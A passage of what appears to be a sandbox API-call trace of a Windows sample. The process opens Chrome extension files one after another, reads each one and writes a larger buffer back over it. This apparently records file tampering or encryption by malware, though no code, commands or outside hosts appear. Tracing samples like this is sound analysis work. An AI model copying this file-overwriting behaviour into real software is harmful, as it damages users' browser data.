lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.474] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a5588, nNumberOfBytesToRead=0x119, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a5588*, lpNumberOfBytesRead=0x331f2bc*=0x119, lpOverlapped=0x0) returned 1 [0161.475] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0161.476] WriteFile (in: hFile=0x1dc, lpBuffer=0x280a628*, nNumberOfBytesToWrite=0x6a1, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x280a628*, lpNumberOfBytesWritten=0x331f2d0*=0x6a1, lpOverlapped=0x0) returned 1 [0161.476] CloseHandle (hObject=0x1dc) returned 1 [0161.476] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.477] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.477] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x161 [0161.477] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.477] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.478] ReleaseMutex (hMutex=0x168) returned 1 [0161.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.478] ReadFile (in: hFile=0x1dc, lpBuffer=0x26a8c68, nNumberOfBytesToRead=0x161, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a8c68*, lpNumberOfBytesRead=0x331f2bc*=0x161, lpOverlapped=0x0) returned 1 [0161.479] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0161.479] WriteFile (in: hFile=0x1dc, lpBuffer=0x280a628*, nNumberOfBytesToWrite=0x6e9, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x280a628*, lpNumberOfBytesWritten=0x331f2d0*=0x6e9, lpOverlapped=0x0) returned 1 [0161.480] CloseHandle (hObject=0x1dc) returned 1 [0161.480] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.481] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.481] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xb3 [0161.481] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.481] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.481] ReleaseMutex (hMutex=0x168) returned 1 [0161.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.481] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.481] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f37818, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37818*, lpNumberOfBytesRead=0x331f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0161.482] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0161.482] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0161.483] CloseHandle (hObject=0x1dc) returned 1 [0161.483] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.483] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.775] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xb3 [0161.775] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.775] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.775] ReleaseMutex (hMutex=0x168) returned 1 [0161.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.776] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f37818, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37818*, lpNumberOfBytesRead=0x331f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0161.777] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0161.777] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0161.777] CloseHandle (hObject=0x1dc) returned 1 [0161.777] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.780] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.780] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xb3 [0161.780] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.780] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.780] ReleaseMutex (hMutex=0x168) returned 1 [0161.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.780] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f37818, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37818*, lpNumberOfBytesRead=0x331f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0161.782] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0161.782] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0161.782] CloseHandle (hObject=0x1dc) returned 1 [0161.783] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.785] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.785] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xb3 [0161.785] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.785] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.785] ReleaseMutex (hMutex=0x168) returned 1 [0161.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.786] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f37818, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37818*, lpNumberOfBytesRead=0x331f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0161.787] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0161.787] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0161.787] CloseHandle (hObject=0x1dc) returned 1 [0161.787] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.788] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.789] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xb3 [0161.789] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.789] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.789] ReleaseMutex (hMutex=0x168) returned 1 [0161.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.789] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f37818, nNumberOfBytesToRead=0xb3, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f37818*, lpNumberOfBytesRead=0x331f2bc*=0xb3, lpOverlapped=0x0) returned 1 [0161.790] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0161.791] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x63b, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x63b, lpOverlapped=0x0) returned 1 [0161.791] CloseHandle (hObject=0x1dc) returned 1 [0161.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.792] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.792] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x9d [0161.792] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.792] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.792] ReleaseMutex (hMutex=0x168) returned 1 [0161.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icon_16.png", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0161.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icon_16.png", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icon_16.png", lpUsedDefaultChar=0x0) returned 11 [0161.792] ReadFile (in: hFile=0x1dc, lpBuffer=0x26b9268, nNumberOfBytesToRead=0x9d, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26b9268*, lpNumberOfBytesRead=0x331f2bc*=0x9d, lpOverlapped=0x0) returned 1 [0161.793] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0161.793] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x625, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x625, lpOverlapped=0x0) returned 1 [0161.793] CloseHandle (hObject=0x1dc) returned 1 [0161.793] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.794] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.794] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xcf [0161.794] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.794] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.794] ReleaseMutex (hMutex=0x168) returned 1 [0161.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.795] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ed1758, nNumberOfBytesToRead=0xcf, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed1758*, lpNumberOfBytesRead=0x331f2bc*=0xcf, lpOverlapped=0x0) returned 1 [0161.796] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0161.796] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x657, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x657, lpOverlapped=0x0) returned 1 [0161.796] CloseHandle (hObject=0x1dc) returned 1 [0161.796] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.797] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.797] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xdc [0161.797] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.797] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.797] ReleaseMutex (hMutex=0x168) returned 1 [0161.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.797] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.798] ReadFile (in: hFile=0x1dc, lpBuffer=0x26c4f58, nNumberOfBytesToRead=0xdc, lpNumberOfBytesRead=0x331f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4f58*, lpNumberOfBytesRead=0x331f2bc*=0xdc, lpOverlapped=0x0) returned 1 [0161.798] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f300*=0) returned 0x0 [0161.799] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x664, lpNumberOfBytesWritten=0x331f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x331f2d0*=0x664, lpOverlapped=0x0) returned 1 [0161.799] CloseHandle (hObject=0x1dc) returned 1 [0161.799] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0161.800] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.800] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0xf5 [0161.800] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0161.800] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.800] ReleaseMutex (hMutex=0x168) returned 1 [0161.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", 